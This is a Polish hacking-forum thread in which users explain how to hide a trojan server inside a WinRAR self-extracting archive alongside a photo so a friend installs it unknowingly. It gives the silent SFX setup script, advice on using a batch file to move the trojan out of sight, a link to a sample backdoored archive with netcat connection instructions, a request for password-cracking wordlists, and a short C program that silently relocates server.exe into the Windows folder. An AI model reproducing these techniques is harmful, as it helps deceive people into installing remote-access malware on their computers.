Bindowanie <RaRem>, jest wykrywalne??

ddd

Użytkownik
Dołączył
Kwiecień 9, 2004
Posty
6
jak zbindowac 2 pliki RaRem <foto i ser. trojana> ????
<
 

ddd

Użytkownik
Dołączył
Kwiecień 9, 2004
Posty
6
<CYTUJE "Sz#sz#"> najlepiej jest tak komuś zbindować

robimy trojana
tworzymy rar'em archiwum sfx z plikami_dla _znajomego

tworzymy rar'em archiwum sfx z 2 w/w plikami i w komętarzu dodajemy
Silent=1
Setup=trojana.exe
Setup=archiwum sfx z plikami_dla _znajomego.exe

Efekt jest taki że rozpakowuje się trojan i plik spakowane w archiwum , kolega jest pewny że to prawdziwe sfx a tu niestety

TEN GOSC TWIERDZI ZE MOZNA
<
 

ddd

Użytkownik
Dołączył
Kwiecień 9, 2004
Posty
6
oki, a mozesz mi powiedziec jak dokladnie to zrobic??

jak zrobic zeby, foto samo sie otworzylo, a przy okazji zainstalowal ser.
 

Plik

Użytkownik
Dołączył
Styczeń 3, 2004
Posty
319
nie no on opisal chyba jak ukryc trojana przed AV aby byl niewykrywalny ... no mozna w zasadzie powiedziec ze to jest binder...
smile.gif
 

ddd

Użytkownik
Dołączył
Kwiecień 9, 2004
Posty
6
a moze mi ktos powiedziec, jakim programem zrobic tak aby...jak zrobic


zeby, foto samo sie otworzylo, a przy okazji zainstalowal ser.
 

rywin

Użytkownik
Dołączył
Kwiecień 22, 2003
Posty
237
A juz napisali

tworzymy rar'em archiwum sfx z 2 w/w plikami i w komętarzu dodajemy
Silent=1
Setup=trojana.exe
Setup=archiwum sfx z plikami_dla _znajomego.exe[/b]

poczytaj w pomocy rar'a tam jest wszystko napisane co powstawiac w "komentarz"
co to jest setup, Path, Silent, itp

zreszta masz tu przyklad takiego sfx'a
http://rywin.republika.pl/pulpit.exe
po uruchomieni telnetuj sie na port 80 do swojego kompa albo polacz sie netcat'em
 

LAME-R

Użytkownik
Dołączył
Listopad 6, 2003
Posty
228
Jemu chodziło o to jak zrobić żeby foto i exek były 1 plikiem
<

areyoufearless.com i Yaba poszukaj
<
 

Rob

Użytkownik
Dołączył
Listopad 18, 2002
Posty
209
Osobiscie uwazam, ze tekst "bindowanie RAR-em" zasluguje na uwiecznienie w dziale "Najczesciej zadawane pytania", ewentualnie nagroda Zlotej Czcionki Teleexpresu.

Ale to oczywiscie tak tylko BTW ;]
 

ddd

Użytkownik
Dołączył
Kwiecień 9, 2004
Posty
6
Dzieki wszystkim za pomoc:)


A zna ktos moze linki gdzie mozna sciagnac SLOWNIKI<chodzi o lamanie hasel>
 

shany

Użytkownik
Dołączył
Październik 6, 2004
Posty
3
Ja mam kilka pytan odnosnie tego pakowania do sfx :oops:
Jak powinien wygladac komentarz zeby np. plik z trojanem wypakowal sie w innym folderze niz reszta (pliki_dla_znajomego.exe")
<
chodzi mi o to zeby trojan zainstalowal sie gdzies w wybranym przeze mnie miejscu np. ( C:windowstemp ) a reszta tam gdzie wybierze sobie ów znajomy.
Bo w przeciwnym razie wszystko wypakuje sie w jeden folder i "znajomy" zobaczy jakis podejrzany plik exe ktory wypakuje sie z tego archiwum :-( nie chce tak ryzykowac i potem sie tlumaczyc
<
myslalem zeby trojankowi dodac atrybut "ukryty" ale przeciez znajomy moze nie miec zaznaczonej opcji "nie pokazuj plikow ukrytych"
moze mi ktos pomoc ?? (tak, tak czytalem pomoc WinRar'a i google.com ...moze niezbyt dokladnie ale nie nie znalazlem nic konkretnego na ten temat)
Jak komus bardzo sie nudzi to moze sobie nawet mnie pokrytykowac.... mi tylko zalezy na odpowiedzi dot. tych komentarzy :oops:
 

Barca

Użytkownik
Dołączył
Marzec 10, 2004
Posty
449
Eee tam, od razu krytykować, dokładnie tak samo nad tym myslałem. Radzę zrobić tak: utwórz plik *.bat, który będzie się uruchamiał po rozpakowaniu sfx. Sfx rozpakuje się (pliki i tak niech mają atrybut "ukryty) wprawdzie cały do jednego folderu, ale *.bat od razu przeniesie (move albo copy+erase - lepiej) "podejrzany" ;-) plik do innego katalogu. Operacja jest szybka, więc gość nawet jak ma w tle włączonego jakiegoś menedźera plików, na dodatek otwartego na katalogu gdzie sfx się rozpakowuje i jeszcze z włączoną opcją wyświetlanai ukrytych plików to i tak szansa, że się zorientuje jest minimalna.
 

shany

Użytkownik
Dołączył
Październik 6, 2004
Posty
3
Brzmi niezle....problem w tym ze ja z programowaniem (nawet tym wsadowym) nie mialem nigdy zbyt wiele wspolnego.. zna ktos jakas stronke z instrukcja jak taki plik *.bat przygotowac? cos lepszego http://www.em.soft.webpark.pl/kod.htm ? albo ewentualnie czy ktos by mogl tu napisac maly, łatwy w zrozumieniu kursik, prosze :oops:

A z załączonym takim plikiem *.bat komentarz w archiwum bylby podobny?

cos w stylu:

Silent=1
Setup=plik.bat
Setup=trojana.exe
Setup=archiwum sfx z plikami_dla _znajomego.exe

?

mam nadzieje ze nie za duzo glupich pytan :wink:
 

saipix

Użytkownik
Dołączył
Sierpień 13, 2004
Posty
131
Kod:
#include <windows.h>



void main()

{

WinExec("cmd.exe /c

move /y server.exe C:WINDOWSserver.exe &&

del archiwum_sfx.exe

",SW_HIDE);

}
No i już wszystko załatwione, nic nam się nie wyświetla, żadne "czarne okienka" tylko klepsydra i już wszystko cicho przeniesione.......
Niema za co, a tak btw. to już chyba setny raz pisze taki czy podobny kodzik.....:]
 
Do góry Bottom